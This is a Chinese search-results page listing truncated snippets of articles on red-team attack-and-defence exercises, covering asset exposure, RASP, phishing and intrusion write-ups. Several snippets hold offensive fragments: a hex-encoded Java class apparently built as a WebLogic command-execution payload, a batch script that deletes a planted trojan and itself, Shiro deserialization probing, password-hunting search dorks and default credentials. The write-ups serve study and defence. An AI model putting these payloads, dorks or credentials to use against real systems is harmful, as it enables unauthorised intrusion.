首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏游戏安全攻防

    浅谈攻防演练

    攻防演练简介 国家级攻防演练从2016年开始,已经走过了6个年头,它是由公安部组织的,这个网络安全攻防演练集结了国家顶级的攻防力量,以不限制手段、路径,进行获取权限并攻陷指定靶机为目的实战攻防演练攻防演练主要目标涵盖国家重要行业的关键信息基础设施、每年覆盖行业、单位、系统都在逐渐扩大。 这个攻防演练时间一般持续2到3周。一般护网演练都是在白天工作日进行,不过攻击方是不分时间点在尝试攻击。 内部违规员工非常外联入群专网; 使用弱口令、密码复用、密码猜测攻击获取权限; 控制欲控、堡垒机、云平台、单点登录、杀毒软件后台等系统以点打面; 搜索多网卡主机、4A系统、网闸等设备纵向渗透; 10攻防演练实战赋能 临战阶段:实战化流程制定、全员攻防演练宣导、全员社工防范测试、安全演练模拟与总结、风险持续评估优化 实战阶段:安全专家值守、实战演练能力(包括:情报整合能力、安全监测能力、安全分析能力 小结 攻防演练过程中最关注的是权限和数据这两个点,基于对这两个点进行攻防

    3.1K20编辑于 2022-04-28
  • 来自专栏RASP社区

    攻防演练 | 攻防在即,RASP为上

    信息安全的关键因素是人,有人的地方就有江湖,江湖中避免不了攻防博弈,而博弈是攻防双方采用越来越新的技术进行较量的过程。对于国家、企事业单位甚至个人而言,守护安全防线,确保数据不遗失是最终目的。 攻防演练活动中“以攻促防”、“以攻验防”的思维正是运用了这种思想,并希望通过这种形式找到安全防线缺失的地方,巩固安全边界,让攻击者无处遁形,所有的“阴谋论”无计可施。 而且,攻防演练活动自兴起以来,越来越常态化。但是,每年的这个时刻,都是攻防双方激烈博弈、尤为紧张的时刻。 ,可谓是神经紧绷、夜晚失眠、饭菜不香,真希望攻防演练的活动抓紧结束,避免自身丢分,被吊打的很惨。 而且,RASP技术集合BAS技术可以在攻防演练活动中实现自动化检测,对安全威胁进行验证,确保安全链路完整。正因此,RASP技术可以更好的在攻防演练中发挥作用,确保防线安全,避免防守方丢分。​

    98830编辑于 2023-04-19
  • 来自专栏红蓝对抗

    攻防|记一次市级攻防演练

    时间 时间在22年护网结束之后,8月中旬左右,当时公司接了一个市级的攻防演练,作为实习生的我,有幸和师傅一起参加,也是我第一次以红队身份参加,当然,更多的还是蹭师傅的光 拿了第一有个感谢信(O(∩_∩ 端口开放: 成果五:某公司MongoDB未授权漏洞(空口令) 这个比较容易,fofa搜了下发现27017端口,遂尝试 成果六:某公司OA注入+任意文件上传 首先是某OA的注入获取shell 攻防开始前已经被上传马了 结尾 我也是第一次参加,虽然每边分到90多个url,但是一半多都是门户网站,一开始说内网可以打,过了一天又不让打了,当时因为cs的版本上线还有点问题纠结好久,然后星期五开始写报告就结束了这次攻防演练

    1K61编辑于 2023-02-28
  • 来自专栏红蓝对抗

    攻防』记一次EDU攻防演练

    文章首发于:奇安信攻防社区 https://forum.butian.net/share/1633 背景 记一次EDU攻防,来之前还是有点怂的,因为前段时间刚打了其它地方EDU感受了一波,小部分目标有重合好难打啊 总结 这次攻防整体的反思,外网打点信息收集尽量宽泛仔细一些,在现场打压力还是大的打不出来东西就是在坐牢,和队伍里师傅第一次协作不是很好没有沟通好打哪个目标好点,师傅第一次打也很懵逼,我打的多之前都是旁边辅助混子哈哈哈

    1.4K40编辑于 2022-08-05
  • 来自专栏FreeBuf

    攻防演练之资产收敛

    前 言 据说今年的攻防演练马上又要开始了,很多企业都开始了前期的准备工作。资产的梳理,暴露面收敛是前期必须做且要做好的工作。 其实在攻防领域也是这样,一个企业安全的好坏不在于某一方面你做的有多好,而在于那些方面还没有做好。只要你在某些方面还存在短板,那么就可能会被攻破。 过多的暴露可能会给攻击者提供额外的信息 人员信息 包括人员的邮箱,姓名,人员兴趣爱好等,过多的人员信息暴露会给社工提供方便,如在攻防中最常用的钓鱼。 近源渗透作为可落地的新型攻击形式,在近年的攻防演练中被多次利用。近源渗透是指攻击者物理入侵目标区域,利用无线网络、物理接口、智能终端等进行渗透。近源渗透犹如“堤溃蚁孔”一般,值得我们重点关注。

    51530编辑于 2023-09-18
  • 来自专栏Gcow安全团队

    攻防演练的热潮发展

    2.护网演练 在准备阶段,演练过程中,红队采取脚本构造恶意payload,来测试安全设备的告警及安全监控分析人员的响应能力。 0xcafebabe0000003301280a004b00870a0088008907008a0a0003008b0a004b008c0a008d008e08008f0a002f00900800910a008d00920a009300940a009300950700960a000d00970a001100980a000d009907009a0a0011009b0a002f009c0a002f009d08009e07009f0a001600870a00a000a10a003f00a20a001600a30800a40a001600a50800a60a002f00a70a00a800a90a002700aa0800ab0a00ac00ad0a002f00ae0800af0700b00a002500870700b10800b20a002700b30a002700b40a002700 800b60a00b700b80800b90700ba0a002f00bb0800bc0a002f00bd0a002f00be0b00bf00c00800c10800c20800c30800c40700c50a003900c60a003900c70a003900c80a00c900ca0800cb0700cc0a003f00b30a003f00cd0a00c900ce0a00cf00d00a00b700d10a00a800d20700d30a004600bb0a00d400d50800d60700d70700d80100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010015284c6a6176612f6c616e672f537472696e673b29560100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01001568747470436f6e6e656374696f6e48616e646c65720100314c7765626c6f6769632f736572766c65742f696e7465726e616c2f48747470436f6e6e656374696f6e48616e646c65723b01000e736572766c65745265717565737401002e4c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c657452657175657374496d706c3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000d6578656375746554687265616401001d4c7765626c6f6769632f776f726b2f457865637574655468726561643b01000f736572766c6574526573706f6e736501002f4c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c6574526573706f6e7365496d706c3b01000b776f726b4164617074657201001b4c7765626c6f6769632f776f726b2f576f726b416461707465723b010014776562417070536572766c6574436f6e746578740100304c7765626c6f6769632f736572766c65742f696e7465726e616c2f576562417070536572766c6574436f6e746578743b0100047061746801000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000b7072696e745772697465720100154c6a6176612f696f2f5072696e745772697465723b0100057368656c6c0100066465636f64650100025b4201000c5f7072696e7457726974657201000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100046e616d650100056279746573010006656e636f646501000c7072696e745772697465723101000d537461636b4d61705461626c650700d70700ba07008a0700d90700da0700db0700dc0700b107006f01000a457863657074696f6e730700dd01000a536f7572636546696c6501000 parser.print_help() print '\nexample:python Main.py --url http://www.sh.sgcc.com.cn --type dirscan --time 1010)安全设备如WAF、IPS可以根据网络情况,安全策略级别调高,如访问频率阀值,封堵时间等。 (11)前期发现的漏洞,高危利用难度低的漏洞优先修复。

    1.2K20发布于 2020-03-06
  • 来自专栏漫流砂

    记一次攻防演练tips | 攻防tips

    现在我依稀记得大家在9月25日晚集体过年的场景,没想到的是:那tm只是开始 这一段时间一直在打攻防,重复、单调、无长进,希望早日脱离苦海吧 下面以攻防过程中的一段经历来展现一些有意思的tips ---- 默认key,使用 CommonsCollections10 测试是否出网 ? 稳了呀! 删除自解压程序 del /f /a /q %b% rem 删除马 del /f /a /q %0% rem 删除bat自身 0x05 内网渗透 我对于攻防比赛中的内网渗透是及其反感的

    1.3K61发布于 2020-12-17
  • 来自专栏红蓝对抗

    攻防|记一次攻防演练实战总结

    文章首发于:奇安信攻防社区 https://forum.butian.net/share/1780 对前阵子的攻防演练比赛进行总结,分享一些个人的思路和方法 0x01 外网打点 资产发现 多测绘平台搜索 #google语法 site:*.edu.cn intext: vpn | 用户名 | 密码 | 帐号 | 默认密码 #github *.edu.cn password 在这次攻防演练里 123 test root 对于一些应用广泛的系统,可以通过google语法搜索其默认密码 这里通过sysadmin/1 成功登入泛微后台 nacos/nacos 常见漏洞利用 对于多目标的攻防演练 192.168.10.20 #非真实域控ip [->]AD [->]192.168.10.20 2、域内主机 DNS 一般就是域控地址 接着可以通过该机器是否开放53和389端口进行进一步确认 这次攻防演练的其中一个目标 到cmd5上进行解密,一块钱拿下云管平台很划算 但某些系统加密方式不是使用md5的,比如之前碰到的一些系统使用的是Bcrypt加密方式,像这种不可逆的加密方式可以通过替换hash进行登录 2a10

    2.1K30编辑于 2022-12-22
  • 来自专栏洛米唯熊

    2020攻防演练弹药库

    各位小伙伴们, 安全界一年一度的激动人心的攻防演练盛况即将来临:) 这里给大家准备些弹药, 主要是近些年的可以进后台/getshell的漏洞, 漏洞太多难免疏漏. 漏洞简介 Apache Shiro 是企业常见的Java安全框架, 其漏洞在2019年攻防演练中起到显著作用 2. 的方法修改序列化内容中的urldns地址 提高检测速度以及后续检测无需使用ysoserial 例如 1234567890.test.ceye.io 可以换成 md5('www.qq.com').hexdigest() [:10

    2.5K20发布于 2020-05-22
  • 来自专栏红蓝对抗

    攻防演练-实战中的外网突破

    在经历了多年的攻防对抗之后,大量目标单位逐渐认识到安全防护的重要性。因此,他们已采取措施尽可能收敛资产暴露面,并加倍部署各种安全设备。 但安全防护注重全面性,具有明显的短板... 1、供应链 在经历了多年的攻防对抗之后,大量目标单位逐渐认识到安全防护的重要性。因此,他们已采取措施尽可能收敛资产暴露面,并加倍部署各种安全设备。

    75120编辑于 2023-10-08
  • 来自专栏安全学习记录

    攻防演练-某集团红队检测

    链接:https://github.com/EdgeSecurityTeam/EHole

    95010编辑于 2022-12-26
  • 来自专栏红蓝对抗

    攻防演练-实战中的外网突破

    在经历了多年的攻防对抗之后,大量目标单位逐渐认识到安全防护的重要性。因此,他们已采取措施尽可能收敛资产暴露面,并加倍部署各种安全设备。 但安全防护注重全面性,具有明显的短板... 1、供应链 在经历了多年的攻防对抗之后,大量目标单位逐渐认识到安全防护的重要性。因此,他们已采取措施尽可能收敛资产暴露面,并加倍部署各种安全设备。

    91230编辑于 2023-10-27
  • 来自专栏红蓝对抗

    攻防|记一次对xx学校的攻防演练

    从今年的五月份正式接触渗透实战到现在我依旧觉得攻防的本质仍是信息收集并且自身的知识面决定了攻击面。 xxx.xxx.xxx.xxx;我们针对该ip进行信息收集;通过网络空间安全测绘平台(鹰图平台、360网络空间测绘、FOFA)进行信息收集;此时发现其7777端口开放服务且搭建了一个致远OA系统 OA系统在攻防演练中都是兵家必争之地 C3%82%C2%8Bv%C3%B4%C2%8C%C2%8D+c%C2%BB%13%7Bh\_%C2%88%28\*%28%C2%AF%C2%8D%3D%40%15Ba%15%C2%B0%C3%B2%10% %C3%80q%C3%AAQ%C3%87%7E%7C%C2%AF%C3%B7%21%25%C2%A0wb%C3%92%C3%8C%C3%89%10%60%C3%8A%C2%B2%C3%AC%3D%C2% 或者172.16段也导致这个攻防分数可能没有全部拿满。

    40210编辑于 2024-01-10
  • 来自专栏红蓝对抗

    攻防|记一次对xx学校的攻防演练

    从今年的五月份正式接触渗透实战到现在我依旧觉得攻防的本质仍是信息收集并且自身的知识面决定了攻击面。若该篇文章存在错误恳请各位师傅们斧正;若您对该渗透流程有更好的建议或者不同的思路想法也烦请您不吝赐教。 xxx.xxx.xxx.xxx;我们针对该ip进行信息收集;通过网络空间安全测绘平台(鹰图平台、360网络空间测绘、FOFA)进行信息收集;此时发现其7777端口开放服务且搭建了一个致远OA系统OA系统在攻防演练中都是兵家必争之地 C3%82%C2%8Bv%C3%B4%C2%8C%C2%8D+c%C2%BB%13%7Bh\_%C2%88%28\*%28%C2%AF%C2%8D%3D%40%15Ba%15%C2%B0%C3%B2%10% %C3%80q%C3%AAQ%C3%87%7E%7C%C2%AF%C3%B7%21%25%C2%A0wb%C3%92%C3%8C%C3%89%10%60%C3%8A%C2%B2%C3%AC%3D%C2% 或者172.16段也导致这个攻防分数可能没有全部拿满。

    1.3K41编辑于 2024-01-09
  • 来自专栏红蓝对抗

    攻防演练下的实战思路:贰

    在壹篇中主要讲了弱口令漏洞在攻防演练中的利用,有朋友可能会觉得弱口令漏洞非常简单,为什么还要讲它呢? 理由是虽然弱口令漏洞非常简单,但是在攻防演练环境下还是普遍存在的,因此针对未知系统我会优先尝试弱口令。 本文主要介绍我在攻防演练中遇到的两个实战思路,分别是逻辑漏洞和SQL注入的利用。 0x01 逻辑漏洞 在资产收集时 fofa 是一个非常不错的工具,比如针对哥谭市的攻防演练,在实在找不到其他资产的情况下,可以使用title="哥谭"搜索全部与哥谭市相关的网络资产,导出后再筛选即可发现一些与目标相关联的系统 只有实践才是检验真理的唯一标准,攻防演练就是一个非常不错的平台,欢迎各位大佬交流相关的心得体会。

    61510编辑于 2022-12-23
  • 来自专栏红蓝对抗

    攻防演练:渗透测试云上初体验

    lavarel框架配置不当导致敏感数据泄露-->云上攻防 lavarel框架敏感数据泄露 在laravel框架的.env配置文件中,默认调试功能debug是开启的。当使程序报错时。 云上攻防 AK、SK泄露: 拿到泄露的AK和SK后开启第一次的云上攻防体验 行云管家: 注意:到这里其实已经可以交差了,渗透测试中千万不要重置密码!!!

    73040编辑于 2023-08-10
  • 来自专栏安全学习记录

    攻防演练】从钓鱼上线到内网漫游

    GB2312systemctl restart httpd修改完成后最终结果:搜集第一批邮箱进行投递,投递完成后等着鱼儿上钩等鱼儿上钩后,登录oa或邮箱系统获取更多员工的邮箱进行二次钓鱼,或者可以利用内网邮箱直接投递这次演练里由于发送邮件数量较多

    1.1K30编辑于 2022-12-26
  • 来自专栏信安之路

    实战分析:乙方视角下行业攻防演练

    网络攻防演练由此而生,并成为各企事业单位,乃至国家层面培养网络安全人才的创新创新型培养模式。 网络攻防演练的价值分析 举行网络攻防演练具有积极意义,攻防队伍实施“背靠背”的演练,通过攻防对抗,考验防守方的安全防护能力以及对安全事件的监测发现能力和应急处置能力。 国内外开展的网络攻防演练均涉及政府机构、企事业等多家单位,通过安全演练强化政企、军民之间的联动防御能力。 通过攻防演练发现安全漏洞与风险,找到网络安全防护的短板,检验网络安全风险通报机制、网络威胁情报共享机制以及应急响应方案的合理性,并在演练后总结优化。 行业性攻防演练相比非行业性攻防演练主要有两点不同,一是业务系统相似甚至相同,横向外部情报的可用性更高(因此防守方之间的合作很有用);二是攻击方的技术支持人员多为安全建设项目中的乙方,获取外部情报相对容易

    1.4K10发布于 2020-01-17
  • 来自专栏红蓝对抗

    攻防演练】从钓鱼上线到内网漫游

    文章由作者授权转载,首发于奇安信攻防社区 https://forum.butian.net/share/1955 从钓鱼上线到内网漫游 钓鱼 邮箱搜集 在线平台搜集,推荐两个好用的平台 https:// restart httpd 修改完成后最终结果: 搜集第一批邮箱进行投递,投递完成后等着鱼儿上钩 等鱼儿上钩后,登录 oa 或邮箱系统获取更多员工的邮箱进行二次钓鱼,或者可以利用内网邮箱直接投递 这次演练里由于发送邮件数量较多

    91530编辑于 2022-12-23
  • 来自专栏安全学习记录

    攻防演练-从钓鱼上线到内网漫游

    restart httpd 修改完成后最终结果: 搜集第一批邮箱进行投递,投递完成后等着鱼儿上钩 等鱼儿上钩后,登录oa或邮箱系统获取更多员工的邮箱进行二次钓鱼,或者可以利用内网邮箱直接投递 这次演练里由于发送邮件数量较多

    69710编辑于 2022-12-26
领券